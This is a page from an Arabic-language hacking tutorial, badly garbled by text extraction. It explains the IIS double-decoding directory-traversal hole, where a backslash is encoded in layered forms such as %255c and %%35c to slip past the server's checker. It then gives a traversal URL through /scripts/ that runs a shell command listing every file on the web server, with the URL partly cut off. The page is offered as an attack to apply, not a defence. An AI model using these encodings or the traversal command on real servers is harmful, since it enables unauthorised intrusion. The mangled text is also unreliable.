Page 150 - بسم الله الرحمن الرحيم

P. 150

‫‪%35 = 5‬‬
‫‪c = %63‬‬
‫و بالتالى نجد انفسنا قد ختدعنا ال ‪ iis checker‬بأننا حللنا ال شفره مرتصين و بالتالى فسنحصل فى المقابل‬
‫على الصل و هو ‪ /‬و بالتالى تصكون قد نجحت الثغره ‪.‬‬
‫فهمتم الن شباب معنى ديكود العنوان مرتصين و فهمتم اساس الثغره و الديكود مرتصين ليس معناه تصكرار‬
‫التحليل الول مرتصين و لكن معناه تصحليل و فك التحليل الول اى ‪ simplify‬الى ابسط و اطول صوره ممكنه‬
‫فى نفس الوقت‬
‫و عشان تصوضح اكثر معك را ح احطلك كيف التركيبه الصح للتحليل ‪::‬‬
‫‪%255c %25 = % 5 = 5 c = c = %5c‬‬
‫‪%%35c % = % %35 = 5 c = c = %5c‬‬
‫‪c = %5c = %63 5 = %35 % = % %%35%63‬‬
‫‪c = %5c = %63 5 = %35 % = %25 %25%35%63‬‬
‫ثم ‪/= 5c% :‬‬
‫ارائيتم التحليل طبعا فى الختر يجب ان يساوى الديكود الصل و هو كما واضح فى مثالنا كل التحليلت تصساوى‬
‫‪ 5c%‬و كما ذكرنا ‪ / = 5c%‬و لكننا حللنا هذا الرمز الى اطول و ابسط تصحليل حتى نخدع ال ‪iis‬‬
‫‪. checker‬‬
‫و فى النهايه بعد فهمنا للثغره و اساسها هيا تصعالو نطبقها مع بعض‬
‫سوف نضع الثغره فى هذا الشكل ‪::‬‬
‫‪http://iisserver/scripts/..%5c..%...xe?/c+dir+c:+/s‬‬
‫و ستدختلون على الموقع بنجا ح و لكن اكيد تصلحظون شئ جهديد قد زاد على الثغره و هذا الشى هو ‪s/+‬‬

‫هذا الرمز‬
‫و عندما تصدمج هذا الرمز مع الثغره كما فى المثال السابق سوف تصأتصيك لسته بكل فايل كبير و صغير فى‬

‫كمبيوتصر الويب سرفر‬
‫و ال تصعبت فى هذا الدرس و تصعبت فى قرائه المعلومات و تصجميعها عن اليونى كود حتى اصل لهذا الشكل‬

‫الختوه و ان شاء ال انتظرو موضوعى القاد‪.‬م بعدما اكون انهيت امتحانى الول فى ‪) MCSE‬ادعولى‬
‫بالنجا ح ( و سيكون عباره عن تصلخيص للتعامل مع شبكات ويندوز ‪ 2000‬و كيفيه اختتراقها و فائده ال‬

‫‪.WIN2000 RESOURCE KIT‬‬
‫انتهى‪،،،‬‬

‫‪150‬‬

145 146 147 148 149 150 151 152 153 154 155